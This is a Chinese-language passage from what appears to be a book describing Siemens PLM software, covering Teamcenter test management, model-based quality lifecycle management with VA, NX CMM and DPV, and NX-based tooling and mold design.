试验请求支持设计工程师开始发起试验请求而执行的任务,包括创建试验样件EBOM配置,通过物理测试来验证产品需求,试验EBOM配置基于产品EBOM的特定配置。创建试验EBOM后,可以通过合并特定产品来更新试验EBOM。之后为试验请求确定测量要求、监控要求,以及试验条件要求。利用分析和仿真过程的结果,为试验请求明确测量位置(见图7-16、图7-17)。 图7-16 试验需求 图7-17 产品BOM与试验BOM的关系 (2)试验准备 试验准备过程描述为了完善试验请求而准备试验样件的任务。 ·根据试验请求中定义的需求,将测量设备定位在试验EBOM的适当位置; ·创建试验程序以执行测试,并在Teamcenter中利用MRO的功能构建出包含实物信息的试验样件的物理配置; ·在试验样件中为每个测量设备分配通道数量; ·基于检测,为测试文档建立一个整合报告; ·基于试验样件的检测来创建确认报告; ·进行试验准备审查(ITRR),ITRR被批准后,就可以执行测试。 4.试验执行 当获得了试验执行批准之后,就依据测试请求而执行任务。提交试验事件到工作流来发起试验执行过程。试验执行在外部系统中进行,Teamcenter柔性化的架构提供和广泛试验采集软件的集成,并可以与LMS Test.Lab产品实现数据、流程交互。利用存储在Teamcenter中的校准数据来处理由测量设备记录的原始数据,并将原始数据和结果数据作为Teamcenter中试验事件的一个超链接。如试验成功执行,会快速生成一个连接到试验请求的最终试验报告。该试验报告向验证计划人员提供试验结果。 5.确认合规要求 验证结果来源是多样化的,包括仿真或者试验的,有时候需要综合分析、比对这些结果,已得到最接近产品实际性能的数据,以便于设计人员做出正确的设计方案选择。基于验证结果以创建合规报告。合格报告是需求验证活动的最后一个阶段。 通过Teamcenter的文件管理方式,可以清楚地查询试验的结果是否满足要求,设置的需求是否得到验证,验证流程是否合规。在Teamcenter平台可以定制丰富的报告模板,快速创建各种报告,如试验报告、项目进度报告、合格报告等。最大化地利用各种对象之间端到端的跟踪功能,记录验证过程成功或者失败(见图7-18)。 图7-18 结构化试验过程记录与试验报告 7.3 价值体现 西门子公司是唯一能够提供完整1D&3D仿真软件、试验软件与工程以及数据管理的PLM软件供应商,在系统工程、仿真、试验以及数据管理方面都有深厚的技术沉淀。融合众多领域专家在Teamcenter平台开发的验证管理平台,为产品开发的验证活动提供一个基于构架的由系统驱动的管理体系与驱动实现。该途径将需求管理、系统工程、结构设计、仿真活动和试验活动结合,采用闭环方式把基于各种功能的模型与集成化的产品定义结合在一起,这样可以使大型企业的各类用户理解和管理所有的复杂数据以及它们之间的关系。在一个平台内所有的信息都被整合到一个环境中,在这个环境中,任何人在开发过程的任何时候都可以做出决定,每一项仿真或者试验业务活动所引用的需求、创建的模型、引用的产品模型、采用的边界条件、仿真和试验的结果等都变彼此关联地保存在一个平台中,最大限度地满足企业研发的敏捷开发的需要。 Teamcenter产品提供了统一平台下的多重领域的数据管理应用平台,采用集成化的平台来降低硬件建设成本和IT维护成本,最大化地帮助分布在全球的各个专业团队实现多学科、多领域的业务快速协同,减少数据交互的出错率,实现最紧密的业务交流,这是符合最新的管理平台发展趋势的系统架构。 第8章 基于模型的全生命周期质量管理解决方案 8.1 业务挑战 近年来,随着十二五规划中后期产业转型的升级加速,“两化融合”,深度改造、提升制造业的自主创新能力,如何以信息化支撑追求可持续发展模式,提高产业核心竞争力已成为当前制造业转型时期面临的严峻挑战。 降低成本、提升产品质量是实现企业核心竞争力的基础条件。质量既是设计出来的,也是制造出来的。设计质量与制造质量的同步工程是提升产品质量的关键实现环节,即产品全生命周期质量管理,由于尺寸质量直接或间接地决定产品功能与性能、产品稳定性与可靠性、产品外观与舒适度以及主观感知等质量指标,因此,尺寸质量的闭环管理成为全生命周期质量管理的核心,如航空航天飞行器、汽车摩托车、轨道机车、船舶重工、工程机械、装备制造与快速电子消费产品等工业化产品,其制造过程中大量的尺寸设计质量问题、尺寸制造互换协调问题、尺寸测量规划与验证问题等,直接影响产品的功能实现、装配质量、研制周期和生产成本,如图8-1所示。传统的尺寸设计与制造互换能力和协调准确度在很大程度上由各种生产工艺装备和手工修配来保障,同时,尺寸设计信息在跨部门之间的传递,如制造与装配、规划与验证、分析与反馈之间经常发生断裂与脱节,造成质量缺陷无法有效追溯。当今市场对这些工业化产品需求的急迫性和多样性要求生产厂家缩短研制周期并增加生产柔性,同时主动提升产品功能与初始感知质量。这对传统方法提出极大挑战,不仅在汽车与快速电子消费类等日常用品领域已成为常态,在更为复杂的产品如航空航天飞行器或重大关键装备(如核电设备)领域尤为突出。 信息化支撑的可持续发展模式,深度推动着工业化产品质量越来越需要依靠贯穿产品设计、工艺设计、产品制造装配过程、测量规划与验证、缺陷分析与反馈的尺寸质量闭环管理,希望通过前期的优化设计来减少后期对制造协调以及昂贵工装的需求,通过尺寸设计信息的准确有效传递与相适应合理的测量规划验证来驱动跨部门协同,缩短研制周期并降低成本。而如今先进的三维容差仿真分析技术(Variation Simulation Analysis,简称VSA)结合高精度的坐标测量机(Coordinate Measurement Machine,简称CMM)与其他检测手段以及生产过程中的尺寸测量规划与验证技术(Dimensional Planning and Validation,简称DPV),以产品制造信息(Product Manufacturing Information,简称PMI)为单一信息源和连续载体,有效促使MBD/MBE中的数字化尺寸协调和管理技术迅速发展并日益成熟。 图8-1 质量问题所导致的成本案例 8.2 解决方案 尺寸管理(Dimensional Management,简称DM)是一种结合三维尺寸链仿真优化和数字化检测分析两项关键技术进行产品开发全过程质量控制的工程方法和手段,通过偏差波动控制和“稳健设计”(Robust Design)来提升产品尺寸质量,降低生产成本,是MBD/MBE范畴中的重要内容。在传统设计中,产品工程师在图纸发放之前凭经验、猜测或简单的公差迭算在图纸上标注好单件公差和容差配合要求,再交由后续工艺和制造工程师进行协调。 受益于信息化支撑,经历技术融合、产品融合、业务融合以及业务衍生创新,先进的虚拟制造仿真技术、数字化检测分析技术、车间智能质量控制技术与PMI语言的逐步推广应用,使得全生命周期质量管理(Quality Lifecycle Management,简称QLM)的解决方案日益成熟。QLM是一个以设计预防为主、测量反馈为控制手段的闭环尺寸同步工程,通过确保MBD/MBE中所有与产品相关的零部件、工艺、规划、工装以及质保人员之间密切协同,有效地管理和跟踪质量控制过程中的各项内容和信息。在设计阶段对PMI中的装配定位特征、基准策略和公差设计进行仿真优化,在工艺阶段致力于设计出能够尽量吸收装配偏差的装配协调方法,力求通过装配仿真和虚拟现实技术等数字化手段在研制过程中尽早完成大多数的设计验证和优化工作,并对制造全过程进行有效的质量监控和管理,确保PMI得到满足。QLM旨在确保产品满足功能、装配和外观设计要求。 针对产品全生命周期质量管理,西门子公司提出了Tecnomatix VATM 、NX CMM、Tecnomatix DPV组合的基于模型的解决方案。 在产品设计阶段,VATM 直接从MBD模型中提取数模和GD&T(PMI)进行尺寸建模,通过仿真产品的制造和装配过程来预测产品的尺寸质量和偏差源贡献因子,实现MBD模型中公差分配的优化,提高产品设计质量。 在工艺规划阶段,NX CMM基于实体模型三维PMI标注驱动的智能化离线编程与虚拟仿真,借助基于模型的PMI信息重用,可有效准确地传递尺寸设计信息,从而确保数字化测量路径规划与虚拟仿真验证结果的可靠性与唯一性,为输出高质量零缺陷的CMM执行程序提供有力支持。 在产品生产阶段,DPV通过对实时生产质量信息进行跟踪、分析和发布,帮助用户及时发现生产过程中的质量问题,通过对制造数据的深度关联分析,寻求问题的根本解决方案,从而提高产品的最终质量,同时提高生产效率并降低生产成本。DPV还可将产品开发过程中的制造质量和设计质量挂钩,形成企业质量管理的闭环。 8.2.1 Tecnomatix VATM 容差分析有时也称为公差分析、偏差分析、尺寸链分析等,是设计阶段QLM的一个重要工具和手段。容差分析通过数理统计的计算方法来分析和评估装配尺寸链中零部件的制造偏差及工艺偏差如何影响产品的各种“关键产品特性”(Key Product Characteristics,简称KPC,如汽车前大灯周边区域的间隙面差配合、移动数字娱乐设备的外壳接缝、运动机构锁止状态的搭接面、核电设备零部件的装配间隙、舱门和机身之间的阶差和缝隙等),从而建立起KPC和影响KPC的各种产品特征(Product Feature,简称PF)的转换函数:KPC=f(PF1,PF2,…,PFn,APV),也称作尺寸链装配函数。容差分析可帮助产品和工艺设计人员分析和评估某个零部件、工艺和工装是否满足既定设计目标,从而通过优化设计和工艺来确保最终的产品制造质量。传统的容差分析方法(见图8-2)有若干种尺寸链公差叠加计算,其缺点是手工计算繁杂、无法考虑三维空间因素、计算结果准确度差,而如今先进的计算机辅助三维容差仿真分析技术(Variation Simulation Analysis,简称VSA)通过仿真产品的制造和装配过程来预测产品的尺寸质量和偏差源贡献因子,从而判断某一阶段的PMI设计是否能够满足尺寸设计要求并给出可能的整改方案,很好地弥补了传统计算方法的不足,有效地支持了设计面向制造和装配(Design for Manufacturing and Assembly,简称DFMA)理念在实际产品研制中的应用。 图8-2 传统容差分析手工计算繁杂 Tecnomatix VATM (简称VATM )是一款由西门子工业软件公司开发的应用较为广泛的三维VSA软件,已在诸多重大产品开发项目中表现出色,并在用户的要求和协助下开发出了一系列针对汽车、航空航天飞行器、运动机构、快速电子消费产品以及大型装备制造工艺特点的装配和计算功能,如适用于汽车薄板件的基于FEA输入的柔性件装配公差仿真计算、适用于运动机构的运动学装配公差仿真计算、适用于航空航天飞行器梁肋墙桁等结构的装配公差仿真计算、适用于新型飞机复合材料的厚度公差仿真计算等,已形成专业工具包。具体地讲,VATM 软件通过建立产品和安装工艺的三维虚拟装配接触链模型来自动确立产品的尺寸链装配函数,通过统计仿真计算来分析和优化产品的容差方案和定位装配工艺,确认对产品KPC质量有重要影响的零部件几何特征,即偏差源贡献因子,作为在制造阶段必须重点监控保障的关键控制特性(Key Control Characteristics,简称KCC,如孔的尺寸公差)。VATM 的输入包括:产品数据,如3D数模、定位基准方案和公差标注(GD&T)及材料特性等;工艺数据,如BOM(产品结构树/顺序)、BOP(工艺方法/操作)、BOR(制造资源和工装等)、KPC质量要求和工艺能力知识等。VATM 的输出则包括KPC的仿真结果和KCC贡献因子报告,如图8-3所示。VATM 模型可以在零部件和工装制造之前就预测出在后续的制造和装配阶段是否会出现尺寸容差问题。工程设计人员可以通过VATM模型的仿真结果和贡献因子排列在数字化产品和工艺并行设计阶段就对产品的设计、公差、工艺、和测量计划进行优化,帮助减少制造和装配偏差对产品质量的影响。 图8-3 VA模型的输入和输出 VATM 可以直接从NX中提取数模和GD&T(PMI)进行尺寸建模,也可以通过JT转换软件从其他CAD文件中将数模和GD&T(如CATIA V5 FTA)提取至JT文件中进行尺寸建模,从而实现了PMI、三维数模和尺寸模型的自动相关联,有效地支持了MBD技术框架。 作为目前市场上唯一能够真正用三维几何特征建模并严格根据GD&T标准来仿真计算三维公差带的VSA软件,VATM 软件由于其先进的算法和功能性以及良好的使用性,在大型装备产品研制中已得到了广泛深入的应用,譬如在飞机制造中目前已存在的模型和分析应用包括飞机主要装配件对接仿真分析(机身断面对接、机翼与机身对接、驾驶舱、引擎安装对准、总装)、空气动力学需求分析(门组件与周边外蒙皮间的缝隙与阶差)、操控中的运动学系统分析(可移动的飞行控制面、门板锁系统运转间隙、起落架与轮胎功能及运转间隙)、子总成制造与应力需求分析(装配顺序优化、局部互换性单元安装、座椅运动轨道调节、机翼装配)、设计与制造两个环节的成本平衡研究(零部件之间的决定性装配和使用工装夹具装配的权衡、门控系统与调节、机械系统调节)等。此外,VATM 软件还有两个非常显著的特点:一、其模型是基于ISO国际标准的轻量化三维数模JT格式,因此一方面具备多CAD平台的兼容性,另一方面可以在普通个人电脑设备上快速仿真运算诸如整个飞机的超大装配(见图8-4);二、具备公差库插入功能(见图8-5),一方面可以实现尺寸模型的快速自动更新,另一方面便于根据企业标准和实践经验建立统一的公差库,积累形成核心的QLM知识。 图8-4 VATM 可以仿真超大装配 图8-5 VATM 的公差库功能 案例说明:某公司一发动机原型样机在测试过程中发现多例过度震动问题,其中一例输油管路磨损导致漏油起火。工程师们认为过度震动是由于机轴和机箱之间存在轴心差。轴承的供应商同时也指出超过0.1mm的轴心差会导致轴承过早报废。通过VATM 仿真分析发现根据当前的设计方案每制造8个发动机就将会有一个发动机的轴心差超过0.1mm,该项指标不合格率达12.5%,其中最大的贡献因子(40%)是左机箱轴承座公差。工程师因此做了三项建议:减小该公差,提高加工精度;修改设计将轴承座孔作为装配的B基准;修改工艺设计,在装配完成后再对该孔进行机加工。 8.2.2 NX CMM NX CMM是西门子工业软件公司在现有NX CAM模块的基础上开发,基于实体模型三维PMI标注驱动的智能化离线编程与虚拟仿真模块,借助基于模型的PMI信息重用,可有效准确地传递尺寸设计信息,从而确保数字化测量路径规划与虚拟仿真验证结果的可靠性与唯一性,为输出高质量零缺陷的CMM执行程序提供有力支持。 当前在生产制造阶段,工艺人员或质保人员对CMM测量编程可分为在线编程(应用被测实物对象于CMM设备以示教模式进行编程)、离线编程(应用恰当的图形化编程处理软件进行脱机编程,大多数情况下需占用某指定品牌CMM设备,使得该设备在脱机编程过程中无法为其他测量任务服务)和手工编程(从二维图纸或三维几何模型上手工编写测量代码)三类,面临的挑战包括被测实物对机器的占用,为支持不同CMM测量设备的各种CMM编程语言所花费的高额培训与时间成本,测量程序编写过程及其验证修正错误所花费的大量时间,产品发生几何设计变更时无法重用测量程序,需另行购买CMM接口或图形编程软件许可证以支持CMM测量设备,质保团队与产品开发团队协同工作非常困难,管理产品变量所增加的复杂性十分不便等,这些使得生产与制造团队迫切需要一个自动化的、可快速响应产品设计变更的、方便部署且简单易学的、能够集成于PLM系统便于与产品工程和制造工艺质量数据同步的、最大程度地共享最佳实践的离线测量编程系统。 NX CMM提供强大的Linked PMI功能,能够自动识别三维PMI标注所引用的测量特征及其基准和公差信息,通过后台规则引擎自动创建面向对象的描述语言,自动生成测量路径(见图8-6),实现虚拟测量仿真,进行干涉检查,支持测量路径优化以缩短测量周期,充分利用CMM硬件资源,经后处理操作转化成业界标准的DMIS规范,联机驱动CMM物理设备执行测量操作,进行实物检测(见图8-7)。 图8-6 测量路径自动生成 图8-7 测量公差控制特征自动创建 NX CMM模块可通过借助三维PMI标注信息驱动,自动化创建测量程序;通过读取轻量化数据JT格式的转换方式,能够对任何三维CAD实体几何模型进行测量编程;通过实体模型的虚拟仿真,能够充分验证测头运动轨迹,有效避免测量过程中的干涉碰撞(“撞针”);通过授权认证的尺寸测量接口标准(Dimensional Measurement Interface Standard,简称DMIS)或二次开发脚本,能够经后处理程序支持任何品牌CMM测量设备或经由CNC机床改造的测量设备;通过提供一个开放的架构,能够允许客户化的定制开发。除此之外,在与NX CAD平台的天然无缝集成环境下,能够自动地根据产品的几何设计变更同步更新测量程序,更进一步,对于已部署西门子PLM产品的企业级客户,允许与CAD建模环境及PLM工作流程管理的完全集成,连接VA三维公差仿真设计输出与生产制造环节的尺寸测量数据规划与验证,将单一系统平台环境的集成优化最大化,最大化客户投入产出效益。 案例说明:某公司产品量产后在交付客户使用中,发现某运动模块工作后无法正常回到设计指定位置这一质量问题,产品与工艺工程师借助前期设计时应用VA三维公差仿真分析对尺寸链影响因子的排序,初步判断影响该功能的关键件与关键尺寸特征,立即会同质量保证部门编程人员,要求迅速对指定零件与特征进行一定样本数量的CMM测量验证,以便根据实测数据找出根本原因,采取相应措施整改,尽可能缩短解决周期,减少该质量问题引起的时间成本。 由于该指定零件与指定特征并未包含在常规测量任务中,同时CMM设备仍承担着几个型号的常规测量任务而无法中断,这对编程人员快速响应上游客户的需求提出了挑战。NX CMM通过前期三维PMI标注自动生成临时测量程序,经过虚拟仿真与碰撞干涉检查,生成标准DMIS语言,驱动CMM实物测量,及时响应测量任务需求,提供数据用于根本原因查找验证,有力地支持了上游客户。本案例中,NX CMM的业务价值在于:快速响应临时测量任务;自动化离线编程,不占用CMM设备的常规测量任务;通过重用前期三维PMI标注,保证测量规划程序与输出结果的准确性和唯一性。 8.2.3 尺寸规划和验证DPV 产品设计和装配工艺得到了优化,合理的测量计划得到了实施,试制阶段顺利完成,整个产品开发进入最后的批量生产阶段。为了确保产品的最终质量,质保工作人员忙于使用各种昂贵的测量设备和先进的测量技术对工厂生产中的零部件和各级总成进行检测,每时每刻都有大量的测量数据产生。如何有效地利用这些通过巨大花费和努力获取的数据来及时诊断生产中的质量状况,并根据数据里的关联信息迅速找到质量问题的根源和相应的解决方案是所有制造企业面对的一个技术难题。Siemens PLM Software的尺寸规划和验证解决方案(Dimensional Planning and Validation,简称DPV)及时地为这个难题提供了圆满的答案,能够迅速对生产过程进行分析和验证。DPV-Lite为独立于Teamcenter的清凉版的数据管理平台,可有自己单独的数据库,同时可根据企业发展的需要扩展到DPV企业版。自2013年5月该解决方案发布以来,阿斯顿马丁、微软、比亚迪和Molex都已经成为了DPV-Lite客户。 DPV是一个集成了多个不同工具的实时生产质量信息跟踪、分析和发布系统。DPV能够帮助用户及时发现生产过程中的质量问题,通过对制造数据的深度关联分析寻求问题的根本解决方案,从而提高产品的最终质量,同时提高生产效率并降低生产成本。DPV成功地将产品开发过程中的制造质量和设计质量挂钩,形成企业质量管理的闭环。DPV是一个在初始化后能够自动化运行的质量系统(见图8-8)。 DPV的主要功能如下。 ·数据处理——由DPV ETL模块完成,工作内容包括从工厂各类测量设备里获取质量数据(Extraction)后,通过数据转换器将不同格式的质量数据转换为统一的DPV输入格式(Translation),然后将这些质量数据上载到企业的中央数据库中储存(Loading)。这些质量数据和各类指标可以来自激光间隙分析、CMM测量、光学或数字测量设备、手持测量仪器,以及一些其他的物理测量系统。在数据的ETL过程中,DPV系统还可以按照用户设定的规则利用现代通信技术(电子邮件、手机短信等方式)对质量数据进行即时报警。 图8-8 DPV的系统组成 ·数据管理——DPV是构建于Teamcenter之上的,可以利用Teamcenter对产品的质量信息(包括设计仿真结果、实时测量数据、质量指标、质量报告、检测工艺和测量设备等)进行充分有效的管理,实现企业范围内的共享。DPV利用Teamcenter作为数据和流程的一个共享主轴,将由数字化设计和质量仿真技术构成的虚拟产品开发环境与由检测设备和工艺构成的现实制造环境连接在一起,把传统上分离的产品设计和生产工艺紧密结合在一起,形成了一个能够把制造结果和设计意图直接而形象地进行对比评估的一个质量协同平台,帮助形成企业的质量管理闭环,真正意义上帮助制造企业实现从传统的以补救整改为主的质量控制向以预防和过程控制为主的质量管理的转变。 ·数据分析和报告——由DPV Reporting&Analysis模块完成。DPV具有目前行业内最为先进的数据分析功能,其中包括完整的数理统计功能和高级的深度关联分析功能,这些分析能力结合3D数模图形能够帮助准确迅速地找到质量问题的根源和相应的解决方案。而这些分析结果又能通过DPV的交互图形报告功能生成各种关联质量报告模板,用于监控生产过程中的尺寸质量。DPV带有众多OOTB(Out of Tool Box)行业内常用的质量报告模板,同时还能通过交互方式按需生成各种客户化报告模板。另外,就像VSA一样,DPV Reporting&Analysis模块也是建立在VisMockup平台上的,所以它也能十分有效和广泛地利用VisMockup的数字化样机和数据可视化功能。 ·数据共享和发布——DPV是一个基于网络的生产质量规划验证系统。通过DPV Web模块,企业范围内来自不同的部门、不同的工厂,甚至不同的供应商用户都可以从任何一个企业内客户端的人机界面访问系统中的检测结果和质量关联报告。通过对系统的设定,这些报告的发布可以是完全自动生成(Automated),或者是由新的测量数据来触发生成(Triggered),或者是由用户按时间、批次、车辆区域、项目等来查询获取(On-Demand)。用户也可以通过定制方式来获取所需要的报告。系统管理员可以设定访问权限来管理不同级不同时期的用户,确保系统的有效性和安全性。此外,DPV还包括许多企业范围的协同功能,包括如论坛、专题BBS等。 DPV解决方案的技术亮点如下。 ·全自动化的质量信息处理机制:从工厂车间的原始测量数据的采集处理(ETL)到各类质量报告和质量信息在全球用户端和互联网上的发布与更新,整个企业的质量信息流在DPV系统中实现全自动运行,帮助在第一时间发现和解决生产过程中的质量问题。系统管理员可以通过对系统的设置来设定和控制信息发布的规则、流向及使用权限。整个自动化运行状况可以通过系统工具如ETL Dashboard和Job Manager等来进行监控; ·基于Teamcenter Unified Architecture架构:方便利用TcUA强有力的数据管理和协同功能以及兼容性来支持和管理现代制造企业的各项质保工作,数据和系统的稳定、安全性也能得到确保。支持质量信息多工厂、跨地域的远程访问和共享,帮助实现企业的全球化PLM战略; ·行业内最佳的数据分析功能:DPV的数据分析功能包括完整的数理统计功能和高级的深度关联分析。一些高级功能包括:测量数据集的合并、派生功能尺寸的创建和计算、基准转换、测点簇的创建和管理、主成分分析方法、测量设备比较、测量数据跟踪代码的植入和比较等; ·先进高效的数据立方技术(Cubing Technology):加快DPV系统对复杂数据关联查询的响应速度,提高计算效率,并且节省存储空间,可极大地满足制造企业对质量信息索引和维护的需求。 DPV解决方案的差别优势如下。 ·基于Teamcenter UA架构,直接利用TcUA所具有的信息发放、更改控制、远程协同和信息安全性,在管理设计数模、工艺流程和生产资源的同一个环境中管理质量数据。系统纵横向的规模可伸缩性支持实现全球范围部署; ·行业内最佳的问题源分析和图形报告能力; ·DPV Web模块数据结构开放,便于和企业内网无缝嵌合,支持企业质保信息系统的发展; ·支持所有主要的测量设备(包括CMM和激光扫描设备等)的数据格式。 8.3 价值体现 VSA、CMM和DPV技术所构成的全生命周期质量管理(QLM)是MBD/MBE技术框架中的重要内容,可革命性地提升产品工程和制造之间的紧密协同,并形成基于MBD/MBE单一数据源的数字化尺寸协调闭环体系。这种闭环体系将大大减少制造业设计工艺开发与生产制造过程中的工程设变、报废和修配工作,从而提升制造厂商的产品质量和经济效益,同时也会显著减少制造业中常见的研制周期的波动和不可预见性,进而降低成本并缩短生产准备周期。西门子QLM的业务价值主要体现在以下几个方面。 ·优化产品和工艺:VATM 可以在产品开发流程前期阶段就发现并解析潜在的尺寸质量问题,指导产品和工艺的优化工作,在制造实际零部件和工装之前解决设计与装配工艺的缺陷。 ·识别关键尺寸:VATM 可以通过仿真分析来确认对产品质量有重要影响的关键尺寸链环节、公差和装配工艺,帮助制定合理的测量计划,确保后续质保工作有针对性。 ·降低成本:VATM 通过对产品质量的提高和产品上市周期的缩短来降低成本。另外,通过对关键产品特性公差的控制,降低其他特征公差的要求,还可降低制造成本。同时对这些关键产品特性的控制有助于最大限度地减少废品、返工以及售后维修量。NX CMM实现检测程序生成及更新的自动化,确保和产品主模型及PMI信息的一致性,增强检测阶段的即时诊断功能,提升产品质量,减少返工件和废品,降低生产成本。 ·提高产品质量和生产效率,降低成本,提升企业形象:通过DPV全自动化地对生产过程的质量进行监控,结合DPV全面而先进的关联分析技术能力,质量问题在第一时间被发现并得以解决,防止问题的循环积累,减少废品率和返工率,减少停线停产。测量设备和质保资源得到有效利用,产品质量得到显著提高,售后质保成本下降,企业形象得以提升。NX CMM支持先进的快速针探检测技术及仿真,可提高检测效率和精确性。帮助对测量工作进行有效的管理,协同企业内部质保资源,在提高质保证工作效益的同时简化工作流程和复杂性,降低企业的质量成本。有效地运用好CMM和CNC来确保并提升加工制造阶段的产品质量,提高企业对测量设备和技术的投资回报,帮助企业更好地规划质量控制。 ·捕捉最佳经验和方法,推进企业工艺标准化:通过比较和深入分析DPV获取的产品和工艺数据,企业范围内各个工厂车间的生产质量和工艺水平可以得到横向比较,不同产品种类和平台的工作方法和经验可以得到纵向研究,有利于增进工程人员对质量问题的认知,捕获最佳经验和教训,推进企业产品设计和工艺规划的循序渐进与标准化,并运用到今后的产品整改、升级和新产品的开发中去。 ·帮助企业实现全球质量战略:全球设计、全球零部件供货、全球制造、全球质保是如今制造企业的发展趋势,DPV系统的纵向和横向规模伸缩性以及全球范围协同能力和数据安全性能够协助企业实现自身扩展,应对制造全球化的挑战。 ·支持MBD/MBE战略:VATM 可以直接从CAD文件中提取数模和PMI中的GD&T信息进行尺寸建模,NX CMM可以重用这些PMI信息于自动化离线CMM智能编程,DPV通过Teamcenter将实际生产验证和虚拟仿真预测合并在一个协同的设计/制造环境中,实现单一的设计、工程、制造和相关供应商数据源,把传统上分离的产品设计和生产工艺紧密结合在一起,形成了一个能够把制造结果和设计意图直接而形象地进行对比评估的一个质量协同平台,形成企业的质量管理闭环,真正意义上帮助制造企业实现从传统的以补救整改为主的质量控制向以预防和过程控制为主的质量管理的转变,实现PMI、三维数模和尺寸模型的自动相关联,有效地支持MBD技术框架和企业的MBD/MBE战略部署。 第9章 基于模型的工装设计解决方案 9.1 业务挑战 工装设计业务的典型流程如图9-1所示。 图9-1 工装设计业务流程 1)在进行工艺设计时,如果某道工序需要工装,首先需要查询是否有可借用的工装。 2)如果有,则直接借用。 3)如果没有,提出工装申请。 4)工装设计人员接到申请后,进行工装设计。在设计时需要参考产品设计、工艺设计需求,也要查询以往是否有类似工装可借鉴。 5)工装设计完成后,加入工装库中,供后续查询应用,并将工装设计结果(例如工装号)返回工艺设计。 6)工艺设计完成后,进行数据发放。 工装设计是产品研制过程中的重要环节,目前工装设计面临的业务挑战主要是: ·工装种类多、需求量大。 ·工装开发的进度直接影响产品制造。 ·工装的设计模式,目前主要还是沿用传统的习惯进行,这已经不能适应对产品制造快速反应的要求。 ·工装设计与工艺设计、产品设计脱节,工装设计未能充分利用三维产品模型,工装设计完成后没有及时给工艺反馈信息,在零件投产时不能确定工装是否准备好。 为此,需要采用数字化的手段,以产品数据管理软件和三维数字化设计软件为基础,搭建数字化工装设计系统;确定工艺工装设计业务协同管理方案,实现单一数据源的工艺工装设计并行工作模式;将数据管理和流程管理推广到工装设计的各环节,实现工装设计流程及更改流程的有效管理;将全三维数字化产品研发技术(MBD)应用于工装设计,通过工装设计知识经验的积累和重用,以及工装设计的模块化应用,实现工装快速设计,达到设计的标准化和规范化。 9.2 解决方案 9.2.1 愿景目标 数字化工装设计解决方案的实现目标是基于MBD的全三维数字化研发模式,将模块化设计的理念应用到工装设计中,通过对工装的模块化分类应用,实现工装设计知识和经验的积累、重用,促进工装的创新设计;实现工装上游数据的有效管理和状态控制,实现工艺工装设计的快速并行协同作业;实现工装数据的全面管理,工装设计结果在资源库中管理的模式,便于工装数据查询、参考和重用。从而达到缩短周期、改进质量、减少成本的目的,同时,数字化工装设计的应用还可帮助企业: ·提高工装标准化、系列化程度。针对产品零件的分类,把常用工装扩展为企业标准,减少工装设计工作量,简化工装制造工艺。 ·建立企业级工装资源库。建立统一的企业级工装数据库,利于产品设计、工装设计、工艺编制、数控加工、工具管理等部门方便地查询和重用工装数据,提高效率,节省成本。 ·实现工装的基于MBD的全三维协同设计和可视化验证。工装设计人员、工艺人员、数控编程人员等可以在统一的数字化平台中协同、同步工作,直接应用数字化产品或工序模型进行装夹、检测、加工等工装的设计、验证,从而检验和改进工艺方法。 另外,数字化工装设计的应用,还可提升工装技术人员的三维设计水平和创新能力,实现: ·工装设计知识和经验的积累、重用。形成工装设计知识和经验积累与重用的机制,不断丰富和完善工装设计知识库,促进技术人员设计水平的提高。同时,将部分工装设计知识通过二次开发的形式置入工装设计软件应用系统,提高工装创新设计的能力。 ·工装设计的标准化、规范化。将标准和规范引入工装设计软件应用系统中,通过标准和规范的强制执行,保证设计的数据质量,增强数据的可读性,为数据共享提供有利条件。 9.2.2 系统构架 数字化工装设计解决方案的系统构架可参见第2章的图2-51。 这个系统由三个层次组成,分别是底层以Teamcenter为基础的工程协同管理环境、中间层的NX三维应用软件系统,以及针对具体工装设计应用的应用规范和三维工装客户化设计环境的应用层。 1.底层——以Teamcenter为基础的工程协同管理平台 底层是工程协同管理的基础构架,为实现工艺工装的协同作业提供保障。它建立在西门子公司提供的Teamcenter软件平台上,通过Teamcenter的数据管理功能,使与工装设计有关的设计数据,例如典型工装模板数据、工装标准件库、典型设计形状库,以及工装产品数据等,都将统一在Teamcenter平台上管理,实现单一数据源的工装设计;通过Teamcenter的过程管理等功能,实现对数字化工装设计的过程控制,包括设计变更的有效管理。图9-2为Teamcenter的功能模块。 图9-2 Teamcenter的功能模块 2.中间层——NX三维应用软件系统 中间层是NX三维应用软件系统,它由工装三维设计所需的基本功能和专业模块组成,包括基本的NX文件处理、三维建模、装配、设计验证等方面的功能,以及针对各种模具的工装设计所需的功能模块,同时提供二次开发的工具(如OPEN/API,Block Style以及KF等功能模块),用于开发专用的工装设计应用工具。 针对模具工装的设计,NX三维应用软件系统提供了专业的功能模块,包括注塑模具设计(MoldWizard)、级进模具设计(PDW)、冲压模具设计(有冲模工程(Die Engineering)、冲模结构(Die Structure)、冲模验证(Die Validation))、电极设计等,如图9-3所示。 图9-3 NX模具工装设计中的专业功能模块 (1)注塑模具设计(MoldWizard) 通过嵌入行业和过程知识,利用过程自动化,注塑模具设计模块(见图9-4)帮助用户减少了注塑模具设计所需要的时间和成本,帮助大量用户得到了模具开发的规模经济效益。 通过使多个设计人员能够并行设计一个注塑模具,注塑模具设计模块支持面向团队的设计。该方法是传统的产品/工装并行开发思想的扩充。在注塑模具设计模块中,注塑模具设计任务可以被分配给并行工作的多个角色来完成。 通过帮助用户捕捉和重用知识,并且引导用户逐步完成设计过程中的每一个步骤,注塑模具设计模块集成并自动化了注塑模具设计过程。 图9-4 NX注塑模具设计(MoldWizard)模块 注塑模具设计模块提供了高级模具分型功能、可订制标准件和模架,并确保整个设计过程的关联性。另外,注塑模具设计模块还提供模具制件验证厚度检查、自动图纸创建和模具制造过程自动化工具。 (2)级进模具设计(PDW) 级进模具设计(见图9-5)是基于NX开发的,针对钣金级进模具设计的专业模块。它是一套专家系统,融合了行业中诸多的经验知识,提供了全流程的设计解决方案。它的出现让级进模具设计进入了全3D的世界:通过智能化的设计流程,引导用户进入级进模具的设计,极大地缩短了设计时间,且可让普通设计者也能完成一些难度比较大的级进模具的设计。 图9-5 NX级进模具设计(PDW)模块 PWD模块的功能包括: ·钣金特征的识别以及直弯钣金零件的相关性展开。 ·复杂曲面零件的展开。 ·毛坯和排样设计。 ·条料设计。 ·镶件组设计(例如折弯、落料、翻孔等)。 ·避让和开槽设计。 ·二维工程图纸自动创建和孔列表。 ·标准件和模架的提供和管理。 ·模具冲压力计算。 ·材料利用率计算。 ·零件可制造性分析。 ·模具报价。 ·模具运动仿真。 ·协同设计。 (3)冲压模具设计 针对冲压模具设计,NX软件系统提供了冲模工程、产品可成形性分析、冲模结构设计、冲模验证等功能模块,如图9-6所示。 图9-6 